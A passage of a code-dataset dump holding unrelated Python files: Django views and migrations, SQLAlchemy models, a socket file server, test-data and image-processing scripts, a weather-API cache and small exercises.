MagicMock()\n sshclient.run=lambda c: (0, b'{\"some\": \"cloud-init-result\"}', '')\n monkeypatch.setattr('aws_ami_creator.cli.sshclient_from_instance', MagicMock(return_value=sshclient))\n\n runner = CliRunner()\n\n data = {'name': 'Test AMI',\n 'base_ami': {'some-region': 'ami-123'},\n 'init_scripts': ['myscript.sh']}\n\n with runner.isolated_filesystem():\n with open('example.yaml', 'w') as fd:\n 
yaml.dump(data, fd)\n with open('myscript.sh', 'w') as fd:\n fd.write('echo \"Hello World!\"')\n result = runner.invoke(cli, ['create', 'some-region', 'subnet-123', 'example.yaml'], catch_exceptions=False)\n assert 'New image ID is ' in result.output\n\n\ndef test_share(monkeypatch):\n\n monkeypatch.setattr('boto.ec2.connect_to_region', MagicMock())\n\n runner = CliRunner()\n\n with runner.isolated_filesystem():\n result = runner.invoke(cli, ['share', 'some-region', 'ami-123', '123123'], catch_exceptions=False)\n assert 'OK' in result.output\n\n\n\n","sub_path":"tests/test_cli.py","file_name":"test_cli.py","file_ext":"py","file_size_in_byte":1821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"552162960","text":"#!/usr/bin/env python\n# encoding: utf-8\n\n\"\"\"\n@version: 1.0\n@author: wanghaiyun\n@contact: 1563713769@qq.com\n@software: PyCharm\n@file: urls.py\n@time: 2017/8/6 13:43\n\n\"\"\"\nfrom django.conf.urls import url\nfrom df_cart import views\n\nurlpatterns = [\n url(r'^cart/$', views.cart, name='cart'),\n url(r'^add(\\d+)_(\\d+)/$', views.add, name='add'),\n url(r'^edit(\\d+)_(\\d+)/$', views.edit, name='edit'),\n url(r'^delete/(\\d+)/$', views.delete, name='delete'),\n]\n","sub_path":"project/天天生鲜/bushu/dailyfresh/df_cart/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"625886344","text":"import datetime\nimport uuid\n\nfrom decorator.unique import unique\nfrom sqlalchemy import Column, ForeignKey, Table\nfrom sqlalchemy.dialects.postgresql import INTEGER, TIMESTAMP, UUID, VARCHAR, \\\n TEXT\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import backref, relationship\n\nBase = declarative_base()\n\nartists_images = Table(\n \"artists_images\",\n Base.metadata,\n Column(\"artist_id\", UUID, ForeignKey(\"artists.artist_id\")),\n Column(\"image_id\", UUID, ForeignKey(\"images.image_id\"))\n)\n\nartists_genres = Table(\n \"artists_genres\",\n Base.metadata,\n Column(\"artist_id\", UUID, ForeignKey(\"artists.artist_id\")),\n Column(\"genre_id\", UUID, ForeignKey(\"genres.genre_id\"))\n)\n\nalbums_images = Table(\n \"albums_images\",\n Base.metadata,\n Column(\"album_id\", UUID, ForeignKey(\"albums.album_id\")),\n Column(\"image_id\", UUID, ForeignKey(\"images.image_id\"))\n)\n\nalbums_genres = Table(\n \"albums_genres\",\n Base.metadata,\n Column(\"album_id\", UUID, ForeignKey(\"albums.album_id\")),\n Column(\"genre_id\", UUID, ForeignKey(\"genres.genre_id\"))\n)\n\ntracks_genres = Table(\n \"tracks_genres\",\n Base.metadata,\n Column(\"track_id\", UUID, ForeignKey(\"tracks.track_id\")),\n Column(\"genre_id\", UUID, ForeignKey(\"genres.genre_id\"))\n)\n\n\nclass Artist(Base):\n __tablename__ = \"artists\"\n\n artist_id = Column(UUID, primary_key=True)\n name = Column(VARCHAR)\n popularity = Column(INTEGER)\n provider_id = Column(UUID, ForeignKey(\"providers.provider_id\"))\n provider_res_id = Column(VARCHAR)\n\n provider = relationship(\n \"Provider\",\n backref=backref(\"artists\", order_by=artist_id, lazy=\"joined\")\n )\n images = relationship(\"Image\", secondary=artists_images, lazy=\"joined\")\n genres = relationship(\"Genre\", secondary=artists_genres, lazy=\"joined\")\n\n def __init__(self, name, popularity):\n self.artist_id = str(uuid.uuid4())\n self.name = name\n self.popularity = popularity\n\n def __repr__(self):\n return 
(\"Artist(name={0},popularity={1},genres={2},images={3},\"\n \"albums={4},provider={5},provider_res_id={6})\").format(\n self.name,\n self.popularity,\n self.genres,\n self.images,\n self.albums,\n self.provider_id,\n self.provider_res_id)\n\n\nclass Album(Base):\n __tablename__ = \"albums\"\n\n album_id = Column(UUID, primary_key=True)\n name = Column(VARCHAR)\n popularity = Column(INTEGER)\n artist_id = Column(UUID, ForeignKey(\"artists.artist_id\"))\n provider_id = Column(UUID, ForeignKey(\"providers.provider_id\"))\n provider_res_id = Column(VARCHAR)\n\n artist = relationship(\n \"Artist\",\n backref=backref(\"albums\", order_by=album_id, lazy=\"joined\")\n )\n provider = relationship(\n \"Provider\",\n backref=backref(\"albums\", order_by=album_id, lazy=\"joined\")\n )\n images = relationship(\"Image\", secondary=albums_images, lazy=\"joined\")\n genres = relationship(\"Genre\", secondary=albums_genres, lazy=\"joined\")\n\n def __init__(self, name, popularity):\n self.album_id = str(uuid.uuid4())\n self.name = name\n self.popularity = popularity\n\n def __repr__(self):\n return (\"Album(name={0},populariy={1},genres={2},images={3},\"\n \"tracks={4},provider_id={5},provider_res_id={6})\").format(\n self.name,\n self.popularity,\n self.genres,\n self.images,\n self.tracks,\n self.provider_id,\n self.provider_res_id)\n\n\nclass Track(Base):\n __tablename__ = \"tracks\"\n\n track_id = Column(UUID, primary_key=True)\n name = Column(VARCHAR)\n popularity = Column(INTEGER)\n track_number = Column(INTEGER)\n lyric = Column(TEXT)\n album_id = Column(UUID, ForeignKey(\"albums.album_id\"))\n\n album = relationship(\n \"Album\",\n backref=backref(\"tracks\", order_by=track_id, lazy=\"joined\")\n )\n genres = relationship(\"Genre\", secondary=tracks_genres, lazy=\"joined\")\n\n def __init__(self, name, popularity, track_number):\n self.track_id = str(uuid.uuid4())\n self.name = name\n self.popularity = popularity\n self.track_number = track_number\n\n def __repr__(self):\n return (\"Track(name={0},popularity={1},track_number={2},genres={3},\"\n \"repositories={4})\").format(\n self.name,\n self.popularity,\n self.track_number,\n self.genres,\n self.repositories)\n\n\nclass Image(Base):\n __tablename__ = \"images\"\n\n image_id = Column(UUID, primary_key=True)\n width = Column(INTEGER)\n height = Column(INTEGER)\n path = Column(VARCHAR)\n\n def __init__(self, path, width, height):\n self.image_id = str(uuid.uuid4())\n self.width = width\n self.height = height\n self.path = path\n\n def __repr__(self):\n return \"Image(path={0},width={1},height={1})\".format(\n self.path, self.width, self.height)\n\n\n@unique(\n lambda name: name,\n lambda query, name: query.filter(Genre.name == name)\n)\nclass Genre(Base):\n __tablename__ = \"genres\"\n\n genre_id = Column(UUID, primary_key=True)\n name = Column(VARCHAR, unique=True)\n\n def __init__(self, name):\n self.genre_id = str(uuid.uuid4())\n self.name = name\n\n def __repr__(self):\n return \"Genre(name={0})\".format(self.name)\n\n\n@unique(\n lambda name: name,\n lambda query, name: query.filter(Provider.name == name)\n)\nclass Provider(Base):\n __tablename__ = \"providers\"\n\n provider_id = Column(UUID, primary_key=True)\n name = Column(VARCHAR, unique=True)\n\n def __init__(self, name):\n self.provider_id = str(uuid.uuid4())\n self.name = name\n\n def __repr__(self):\n return \"Provider(name={0})\".format(self.name)\n\n\nclass Repository(Base):\n __tablename__ = \"repository\"\n\n track_id = Column(UUID, ForeignKey(\"tracks.track_id\"), 
primary_key=True)\n provider_id = Column(\n UUID,\n ForeignKey(\"providers.provider_id\"),\n primary_key=True\n )\n link = Column(VARCHAR)\n duration_second = Column(INTEGER)\n updated_time = Column(\n TIMESTAMP(timezone=True),\n default=datetime.datetime.now)\n\n provider = relationship(\"Provider\", backref=backref(\"repositories\"))\n track = relationship(\n \"Track\",\n backref=backref(\"repositories\", lazy=\"joined\")\n )\n\n def __init__(self, link, duration_second):\n self.link = link\n self.duration_second = duration_second\n\n def __repr__(self):\n return (\"Repository(link={0},duration_second={1},\"\n \"updated_time={2}\").format(\n self.link,\n self.duration_second,\n self.updated_time)\n","sub_path":"daemon/database/entity.py","file_name":"entity.py","file_ext":"py","file_size_in_byte":6930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"89392060","text":"# -*- coding: UTF-8 -*-\nfrom socket import *\nimport pandas as pd\nimport pickle\nfrom base64 import b64decode\nfrom Crypto.Hash import SHA256\nfrom Crypto.Cipher import AES\nfrom Crypto.Random import get_random_bytes\nfrom Crypto.Util.Padding import pad\nimport json\n\nfilename = './data/EncryptedFile/EncryptedFileName.txt'\n\n\ndef find(ct_bytes):\n L1 = ct_bytes[:8]\n hash_object1 = SHA256.new(L1+b'secret')\n hashkey = hash_object1.digest()\n EncryptedFileName=open(\"./data/EncryptedFile/EncryptedFileName.txt\",\"r\")\n ans_message=''\n for t in EncryptedFileName.readlines():\n tk=b64decode(t[:-4])\n c = bytearray(len(ct_bytes))\n for i in range(len(ct_bytes)):\n c[i] = ct_bytes[i] ^ tk[i]\n L = c[:8]\n R = c[8:]\n\n hash_object = SHA256.new(L+hashkey)\n hash = hash_object.digest()\n if (hash[:8] == R) :\n file=open(\"./data/EncryptedFile/\"+t[:-1],\"r\")\n file_data=file.read()\n\n ans_message=file_data\n #print(b64decode(file_data).decode('utf-8'))\n\n file.close()\n return ans_message\n\n\nserverSocket = socket(AF_INET, SOCK_STREAM) \nserverPort = 6788\nserverSocket.bind(('', serverPort))\nserverSocket.listen(10)\nwhile True: \n print('Ready to serve...') \n connectionSocket, addr = serverSocket.accept()\n ct_bytes = connectionSocket.recv(1024)\n #print(message)\n return_message = find(ct_bytes)\n #print(return_message)\n #send_message = pickle.dumps(return_message)\n #print(send_message)\n connectionSocket.send(return_message.encode('utf-8'))\n connectionSocket.close()\n\nserverSocket.close()\n","sub_path":"2-StorageFile/FileServer.py","file_name":"FileServer.py","file_ext":"py","file_size_in_byte":1644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"379201685","text":"from django_tables2 import SingleTableView, RequestConfig\nfrom documents.models import Document, ArchObject, DigObject\nfrom .filters import DocumentListFilter, ArchObjectListFilter, DigObjectListFilter\nfrom .tables import DocumentTable, ArchObjectTable, DigObjectTable\nfrom .forms import GenericFilterFormHelper\n\n\nclass GenericListView(SingleTableView):\n filter_class = None\n formhelper_class = None\n context_filter_name = 'filter'\n paginate_by = 25\n\n def get_queryset(self, **kwargs):\n qs = super(GenericListView, self).get_queryset()\n self.filter = self.filter_class(self.request.GET, queryset=qs)\n self.filter.form.helper = self.formhelper_class()\n return self.filter.qs\n\n def get_table(self, **kwargs):\n table = super(GenericListView, self).get_table()\n RequestConfig(self.request, paginate={\n 'page': 1, 'per_page': 
self.paginate_by}).configure(table)\n return table\n\n def get_context_data(self, **kwargs):\n context = super(GenericListView, self).get_context_data()\n context[self.context_filter_name] = self.filter\n return context\n\n\nclass DocumentListView(GenericListView):\n model = Document\n table_class = DocumentTable\n template_name = 'browsing/document_list_generic.html'\n filter_class = DocumentListFilter\n formhelper_class = GenericFilterFormHelper\n\n\nclass ArchObjectListView(GenericListView):\n model = ArchObject\n table_class = ArchObjectTable\n template_name = 'browsing/archobject_list_generic.html'\n filter_class = ArchObjectListFilter\n formhelper_class = GenericFilterFormHelper\n\n\nclass DigObjectListView(GenericListView):\n model = DigObject\n table_class = DigObjectTable\n template_name = 'browsing/digobject_list_generic.html'\n filter_class = DigObjectListFilter\n formhelper_class = GenericFilterFormHelper\n","sub_path":"browsing/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"244615208","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom openpyxl import load_workbook\nfrom openpyxl import Workbook\nimport os\nimport datetime\nimport common\nimport china_regions_dict as CRD\n\n\nheadlist = ['客户名称', '手机号', '归属用户', '归属渠道', '客户证件类型', '客户证件号码',\n '车牌号', '车辆识别代号', '车型名称', '行驶城市', '车辆注册日期', '保险公司',\n '商业险到期日', '交强险到期日', '商业险保单号', '交强险保单号', '客户标签', '备注'\n ]\n\n# inwb = load_workbook('客户test1.xlsx')\nwb = Workbook()\n# 激活 worksheet\nws = wb.active\n# headlist分配到第一行中\nws.append(headlist)\n# 商业险到期时间=交强险到期时间\ninstime = mustime = common.endTime()\nprovince_city_district = CRD.regions()\n# 表格内容infolist\ninfolist = [common.customName(), common.customPhone(), '14100000003',\n '飞侠太保杭州', '身份证', common.customID(), common.carPlate(),\n common.vinNum(), '东风标致DC7164DB轿车', province_city_district[1],\n common.regTime(), common.companyName(),\n instime, mustime, common.policyNum(), common.policyNum(), common.customTag(), common.remarks(10)]\n\n# 附加infolist,从第一行开始附加x条数据\nif __name__ == '__main__':\n x = 10\n # NUM = input('需数据n条:')\n # print('打印%s条数据...' 
% NUM)\n # x = int(NUM)\n for num in range(x):\n ws.append(infolist)\n print(infolist)\n # input('Press Enter to exit...')\n\n# 保存文件\nCUS_FILE = '客户test' + datetime.datetime.now().strftime('%Y%m%d%H%M%S') + '.xlsx'\nwb.save(CUS_FILE)\n\n# BASE_DIR = os.path.dirname(__file__)\n# DC_PATH = BASE_DIR + '\\\\' + datetime.datetime.now().strftime('%Y%m%d') + '.xlsx'\n# 获取到当前文件的目录,并检查是否有该文件,如果不存在则自动新建文件\n# if not os.path.exists(DC_PATH):\n# open(DC_PATH, 'w')\n","sub_path":"TestDataBuilder/code/customer_sheet.py","file_name":"customer_sheet.py","file_ext":"py","file_size_in_byte":1963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"554205090","text":"import os\nimport unittest\nimport cv2\nimport numpy as np\n\nfrom binarize_image import ImageBinarizer\n\nclass ImageBinarizerTest(unittest.TestCase):\n\t\n\tdef test_image_binarizer_returns_binarized_image(self):\n\t\tinput_file = \"./test_images/test1.jpg\"\n\t\timage = cv2.imread(input_file)\n\t\timageBinarizer = ImageBinarizer()\n\n\t\tbinarized_image = imageBinarizer.binarize(image)\n\t\tself.assertTrue(self._is_binary(binarized_image))\n\n\n\tdef test_binarize_file(self):\n\t\tinput_file = 'test_images/test5.jpg'\n\t\toutput_file = 'output_images/binarized.jpg'\n\n\t\timageBinarizer = ImageBinarizer()\n\t\timageBinarizer.binarize_file(input_file, output_file)\n\t\tself.assertTrue(os.path.exists(output_file))\n\n\n\tdef _is_binary(self, image):\n\t\treturn np.array_equal(image, image.astype(bool))\n\n\n","sub_path":"test/test_image_binarizer.py","file_name":"test_image_binarizer.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"292616292","text":"import csv\nimport os\nimport re\nimport tempfile\nfrom io import StringIO\nfrom zipfile import ZipFile\nfrom cap_sender.cap_index import CAPIndex\n\n\nclass ZipProcessor:\n \"\"\"\n Base class for handling zip files.\n \"\"\"\n zip_pattern = ''\n pdf_pattern = ''\n\n def __init__(self, filename):\n self.fn = filename\n\n @classmethod\n def match(cls, filename):\n \"\"\"\n Class method which, when the given filename\n matches cls.zip_pattern, will return the class.\n \"\"\"\n bn = os.path.basename(filename)\n if re.match(cls.zip_pattern, bn):\n return cls(filename)\n\n def transform(self):\n \"\"\"\n Method which will be called to perform transformations\n on the files belonging to this class.\n \"\"\"\n pass\n\n\nclass TransferAppDataProcessor(ZipProcessor):\n \"\"\"\n Class for handling Transfer Application Data files.\n \"\"\"\n zip_pattern = r'\\d+_\\d+_\\d+_TR_Applications\\.txt'\n\n def transform(self):\n with open(self.fn, encoding='utf8') as f:\n data = f.read()\n pattern = r'custom_questions_(\\d+)_(.+?)(?=[\\t\\r\\n])'\n replacement = r'\\2_\\1'\n with open(self.fn, 'w', encoding='utf8') as f:\n f.write(re.sub(pattern, replacement, data))\n\n\nclass TransferProcessor(ZipProcessor):\n \"\"\"\n Class for handling CommonApp transfer zip files, which all need\n an index file to be generated for DIP.\n \"\"\"\n pdf_fieldnames=[]\n\n def transform(self):\n \"\"\"\n Create an `index.txt` tsv listing each pdf file and attributes\n parsed from the filename.\n \"\"\"\n with ZipFile(self.fn, 'r') as zf:\n namelist = zf.namelist()\n with StringIO(newline='') as f:\n writer = csv.DictWriter(f,\n fieldnames=self.pdf_fieldnames,\n delimiter='\\t',\n extrasaction='ignore')\n writer.writeheader()\n for fn in namelist:\n try:\n 
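                        # re.match() returns None when a filename does not fit
                        # pdf_pattern, so .groupdict() raises AttributeError,
                        # which the except clause below catches in order to log
                        # and skip files with unexpected names.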
writer.writerow(re.match(self.pdf_pattern, fn).groupdict())\n except AttributeError as e:\n print(f'Error parsing filename:\\n'\n f' zipfile: {self.fn}\\n'\n f' pdf: {fn}')\n with ZipFile(self.fn, 'a') as zf:\n zf.writestr('index.txt', f.getvalue())\n\n\nclass TransferAppProcessor(TransferProcessor):\n \"\"\"\n TransferProcessor class for handling\n CommonApp Transfer Application zip files.\n \"\"\"\n zip_pattern = r'\\d+_\\d+_\\d+_TR_Applications\\.zip'\n pdf_pattern = r'(?PTR_(?P\\d+)_(?P.+?)_(?P.+?)_.+)'\n pdf_fieldnames = ['filename', 'commonapp_id', 'last_name', 'first_name']\n\n\nclass TransferEvalProcessor(TransferProcessor):\n \"\"\"\n TransferProcessor class for handling\n CommonApp Transfer Evaluation zip files.\n \"\"\"\n zip_pattern = r'\\d+_\\d+_\\d+_TR_Evaluations\\.zip'\n pdf_pattern = r'(?PTR_(?P\\d+)_(?P.+?)_(?P.+?)_(?P\\d+)_Evaluation_(?P.+?)_.+)'\n pdf_fieldnames = ['filename', 'commonapp_id', 'last_name', 'first_name',\n 'doc_id', 'recommender']\n\n\nclass TransferTranscriptProcessor(TransferProcessor):\n \"\"\"\n TransferProcessor class for handling\n CommonApp Transfer Transcript zip files.\n \"\"\"\n zip_pattern = r'\\d+_\\d+_\\d+_TR_College_Transcript\\.zip'\n pdf_pattern = r'(?PTR_(?P\\d+)_(?P.+?)_(?P.+?)_(?P\\d+)_(?PTranscript)_(?P.+?)_(?P.+?)_(?P.+?)\\.pdf)'\n pdf_fieldnames = ['filename', 'commonapp_id', 'last_name', 'first_name',\n 'doc_id', 'doc_type', 'college_code', 'college_name',\n 'submit_dt']\n\n\nclass FreshmanProcessor(ZipProcessor):\n \"\"\"\n Class for handling CommonApp Freshman zip files, which all need\n to have the xml index file transformed into a tsv DIP index.\n \"\"\"\n def transform(self):\n temp_dir = tempfile.TemporaryDirectory()\n with ZipFile(self.fn, 'a') as zf:\n zf.extractall(temp_dir.name)\n for f in os.listdir(temp_dir.name):\n if f.endswith('.xml'):\n infile = os.path.join(temp_dir.name, f)\n outfile = infile + '.txt'\n c = CAPIndex(infile)\n c.to_csv(outfile, delimiter='\\t')\n os.remove(infile)\n with ZipFile(self.fn, 'w') as zf:\n for f in os.listdir(temp_dir.name):\n out_file = os.path.join(temp_dir.name, f)\n zf.write(out_file, f)\n\n\nclass FreshmanAppProcessor(FreshmanProcessor):\n \"\"\"\n FreshmanProcessor class for handling\n CommonApp Freshman Application zip files.\n \"\"\"\n zip_pattern = r'ugaappl_.+\\.zip'\n\n\nclass FreshmanFormsProcessor(FreshmanProcessor):\n \"\"\"\n FreshmanProcessor class for handling\n CommonApp Freshman School Forms zip files.\n \"\"\"\n zip_pattern = r'ugaapplsform_.+\\.zip'\n","sub_path":"cap_sender/cap_zips.py","file_name":"cap_zips.py","file_ext":"py","file_size_in_byte":5112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"649891390","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('shop', '0006_auto_20160928_1409'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Product',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('name', models.CharField(max_length=50)),\n ('description', models.TextField()),\n ('photo', models.URLField()),\n ('price', models.PositiveIntegerField()),\n ('quantity_On_stock', models.PositiveIntegerField()),\n ('category', models.ForeignKey(to='shop.Category')),\n ],\n ),\n 
]\n","sub_path":"shop/migrations/0007_product.py","file_name":"0007_product.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"499999655","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\nf = open('out.txt','r')\ns = f.read().split('\\n')[:-1]\n\ny1 = []\ny2 = []\ny = []\n\nfor line in s:\n\ta,b = [float(i) for i in line.split()]\n\t#print(a,b)\n\ty1.append(a)\n\ty2.append(b)\n\ty.append(a-b)\n\t\t\nt = np.linspace(0,100,len(s))\ny1 = np.array(y1)\ny2 = np.array(y2)\ny = np.array(y)\n\nplt.subplot(3,1,1)\nplt.plot(t,y1)\nplt.ylabel('Neuron 1')\n\nplt.subplot(3,1,2)\nplt.plot(t,y2)\nplt.ylabel('Neuron 2')\n\nplt.subplot(3,1,3)\nplt.plot(t,y)\nplt.ylabel('Torque')\n\nplt.show()\n","sub_path":"Code/old_versions/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"575691389","text":"import MySQLdb\nimport json\nimport requests\nimport time\n\ndef getAPI():\n db=MySQLdb.connect(host=\"localhost\", user=\"DBUSER\", passwd=\"DBPASS\", db=\"mydb\"); #connect to database and get all rows from alarm table\n cur=db.cursor(); #create cursor to populate with sql results\n nameStr=(\"Select weather_api, weather_location from pialarm_settings\");\n cur.execute(nameStr);\n curResult=cur.fetchone();\n WApi=curResult[0];\n WLoc=curResult[1];\n url=\"http://api.openweathermap.org/data/2.5/forecast?id=\"+WLoc+\"&APPID=\"+WApi\n response=requests.get(url)\n #parsed=json.loads(response.text)\n return response \n \ndef getLastWeatherTime():\n #connect to database and get all rows from alarm table\n db=MySQLdb.connect(host=\"localhost\", user=\"DBUSER\", passwd=\"DBPASS\", db=\"mydb\")\n cur=db.cursor()\n curStr=(\"SELECT last_result, result FROM pialarmweather\")\n cur.execute(curStr)\n \n if(cur.rowcount>0):\n for row in cur.fetchall():\n last_tstamp=int(row[0])\n cur_tstamp=int(round(time.time()))\n \n if((cur_tstamp-last_tstamp)>600):\n new_result=getAPI()\n new_text=new_result.text\n cur.execute(\"\"\"UPDATE pialarmweather SET result='/home/pi/Current_Weather.txt', last_result='%s'\"\"\", [cur_tstamp])\n db.commit()\n else:\n old_text=str(row[1])\n text_file=open(old_text, \"r\")\n new_text=text_file.read() \n parsed=json.loads(new_text)\n cur_temp_k=parsed['list'][0]['main']['temp']\n cur_temp_c=cur_temp_k-273.15\n return cur_temp_c \n else:\n new_result=getAPI()\n new_text=new_result.text\n\n parsed=json.loads(new_text)\n cur_temp_k=parsed['list'][0]['main']['temp']\n cur_temp_c=cur_temp_k-273.15\n\n cur_tstamp=int(round(time.time()))\n curStrOne='INSERT INTO pialarmweather (result, last_result) VALUES (\"/home/pi/Current_Weather.txt\", '+str(cur_tstamp)+')'\n\n text_file=open(\"/home/pi/Current_Weather.txt\", \"w\")\n text_file.write(new_text)\n text_file.close()\n cur.execute(\"\"\"INSERT INTO pialarmweather VALUES(null, '/home/pi/Current_Weather.txt', '%s');\"\"\", [cur_tstamp])\n db.commit()\n return cur_temp_c \n","sub_path":"piweather.py","file_name":"piweather.py","file_ext":"py","file_size_in_byte":2010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"653042884","text":"import math\n\nresult = []\nbase = 2\nregister = base\n\nnum = list(range(3, 100))\n\nwhile num:\n while register < 100:\n if register in num:\n num.remove(register)\n register = register + base\n print(register)\n result.append(base)\n base = 
num[0]\n register = base\n del num[0]\n print(str(len(result)) + \" = len\")\n\n print (result)\n\n\nresult.append(base)\nprint(result[-1])\n\n#NoNo......Failed....\n'''result = [2]\ntmp = []\ni = 1\n\n\nwhile True:\n print(result)\n i = i + 2\n Range = range(3, math.sqrt(i) -1)\n for n in Range:\n if i % n == 0:\n break\n result.append(i)\n if len(result) == 10001:\n print(result[-1])\n break'''\n\n\n\n\n\n\n","sub_path":"Euiller007.py","file_name":"Euiller007.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"575602447","text":"# -*- coding = utf-8 -*-\r\n# @Time: 23:45\r\n# @Author:LEE\r\n# @Software:PyCharm\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\n# 导入逻辑回归模型函数库\r\nfrom sklearn.linear_model import LogisticRegression\r\n\r\n\r\ndef sigmoid(z):\r\n phi_z = 1.0 / (1.0 + np.exp(-z))\r\n return phi_z\r\n\r\n\r\ndef plt_sigmoid(data, w):\r\n # 其拟合方程形式为f(x)=w0+w1*x1+w2*x2....\r\n # 生成两个矩阵\r\n data = np.mat(data)\r\n w = np.array(w)\r\n z = data * np.transpose(w) # 矩阵转置,相乘后得到z值\r\n z.sort(axis=0)\r\n\r\n # 画sigmoid函数\r\n phi_z = sigmoid(z)\r\n plt.plot(z, phi_z)\r\n plt.axvline(0.0, color='k')\r\n plt.axhspan(0.0, 1.0, facecolor='1.0', alpha=1.0, ls='dotted')\r\n plt.yticks([0.0, 0.5, 1.0])\r\n plt.ylim(-0.1, 1.1)\r\n plt.xlabel('z')\r\n plt.ylabel('$\\phi (z)$')\r\n plt.show()\r\n\r\n\r\n# 训练效果可视化\r\ndef train_plt(data, label, lr_clf):\r\n plt.figure()\r\n plt.scatter(data[:, 0], data[:, 1], s=50, c=label, cmap='viridis')\r\n # 可视化决策边界\r\n nx, ny = 200, 100\r\n x_min, x_max = plt.xlim()\r\n y_min, y_max = plt.ylim()\r\n x_grid, y_grid = np.meshgrid(np.linspace(x_min, x_max, nx), np.linspace(y_min, y_max, ny))\r\n z_proba = lr_clf.predict_proba(np.c_[x_grid.ravel(), y_grid.ravel()])\r\n z_proba = z_proba[:, 1].reshape(x_grid.shape)\r\n\r\n plt.contour(x_grid, y_grid, z_proba, [0.5], colors='blue', linewidths=3)\r\n plt.show()\r\n\r\n\r\n# 可视化预测新样本\r\ndef test_plt(data, label, lr_clf):\r\n plt.figure()\r\n print(\"请输入要预测点的坐标:\")\r\n x = int(input(\"x=\"))\r\n y = int(input(\"y=\"))\r\n new_point1 = np.array([[x, y]])\r\n plt.scatter(new_point1[:, 0], new_point1[:, 1], cmap='viridis', s=50)\r\n plt.annotate(s='the new point 1', xy=(0, -1), xytext=(-2, 0), color='blue',\r\n arrowprops=dict(arrowstyle='-|>', connectionstyle='arc3', color='red'))\r\n plt.scatter(data[:, 0], data[:, 1], s=50, c=label, cmap='viridis')\r\n plt.title('Dataset')\r\n\r\n # 可视化决策边界\r\n nx, ny = 200, 100\r\n x_min, x_max = plt.xlim()\r\n y_min, y_max = plt.ylim()\r\n x_grid, y_grid = np.meshgrid(np.linspace(x_min, x_max, nx), np.linspace(y_min, y_max, ny))\r\n z_proba = lr_clf.predict_proba(np.c_[x_grid.ravel(), y_grid.ravel()])\r\n z_proba = z_proba[:, 1].reshape(x_grid.shape)\r\n plt.contour(x_grid, y_grid, z_proba, [0.5], colors='blue', linewidths=3)\r\n plt.show()\r\n\r\n\r\ndef exe4(clusterAssment):\r\n # 构造数据集\r\n df = pd.read_table(\"teacher_data.txt\", header=None, sep='\\t')\r\n df.columns = ['x', 'y']\r\n data = df.values.tolist() # 把dataframe数据转变为list类型\r\n data = np.array(data)\r\n # 给数据源打标签\r\n label = []\r\n for i in range(len(clusterAssment)):\r\n label.append(clusterAssment[i][0])\r\n label = np.array(label)\r\n\r\n # 调用逻辑回归模型,并拟合所构造的数据集\r\n lr_clf = LogisticRegression()\r\n lr_clf = lr_clf.fit(data, label) # 其拟合方程形式为f(x)=w0+w1*x1+w2*x2\r\n\r\n # 学习并画出sigmoid函数\r\n w = lr_clf.coef_ # 使用coef_ 查看对应模型的系数w\r\n plt_sigmoid(data, w)\r\n\r\n # 可视化模型\r\n train_plt(data, 
label, lr_clf)\r\n\r\n # 用学习好的模型对(2,6)分类。\r\n # 可视化预测点\r\n test_plt(data, label, lr_clf)\r\n","sub_path":"Experience4/exe4.py","file_name":"exe4.py","file_ext":"py","file_size_in_byte":3352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"370333101","text":"f = open('temp.txt','r')\r\nprint(f.read())\r\nf.seek(0)\r\nstr_num = f.readline()\r\nlist_num = str_num.split(' ')\r\ndel list_num[-1]\r\nnum =[int(i) for i in list_num]\r\nday_max = num.index(max(num))+1\r\nday_min = num.index(min(num))+1\r\nprint('本周气温最高是第',day_max,'天,气温最低是第',day_min,'天.')\r\n\r\n","sub_path":"Python/文件操作/找出文件内容中的最高最低值(气温最高与最低).py","file_name":"找出文件内容中的最高最低值(气温最高与最低).py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"155729009","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Contato',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('nome_completo', models.CharField(max_length=50)),\n ('data_nascimento', models.DateField(verbose_name=b'Data de Nascimento')),\n ],\n ),\n migrations.CreateModel(\n name='Telefones',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, 